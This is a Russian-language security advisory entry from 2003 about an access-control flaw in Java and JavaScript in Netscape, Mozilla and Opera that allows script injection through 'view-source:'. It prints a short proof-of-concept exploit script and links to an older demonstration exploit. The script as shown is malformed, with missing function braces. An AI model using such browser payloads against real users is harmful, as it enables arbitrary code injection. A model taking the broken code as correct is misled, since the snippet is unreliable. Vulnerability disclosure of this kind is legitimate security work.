| Дата публикации: | 10.06.2003 |
| Всего просмотров: | 1412 |
| Опасность: | |
| Наличие исправления: | |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | |
| Воздействие: | |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | |
| Описание: | Уязвимость в управлении доступом обнаружена в JAVA и Javascript выполнених в браузерах Netscape, Mozilla и Opera. Злонамеренный сценарий или апплет может выполнить произвольный код и подключится к произвольным доменам.
Сообщается, что удаленный пользователь может создать HTML, который, когда будет загружен целевым пользователем, внедрит и выполнит произвольный Javascript код в JavaScript консоле в браузере целевого пользователя, используя функцию "view-source:". Эксплоит:
<script>
function werd()
a.document.open();
a.document.write("<h1>werd</h1>");
a.document.close();
function winopen() {
a=window.open("view-source:javascript:location='http://www.iss.net';");
setTimeout('werd()',23000);
</script>
Также сообщается, что злонамеренный апплет может выполнить подключения к произвольным доменам. Демонстрационный эксплоит был написан несколько лет назад для уязвимости в Microsoft Internet Explorer, которая была устранена с того времени, но появилась в Mozilla, Opera и Netscape:
http://neurosis.hungry.com/~ben/msie_bug/ Способов устранения обнаруженной уязвимости не существует в настоящее время. |
| Ссылки: | Cross-Platform Browser vulnerabilities - Critical |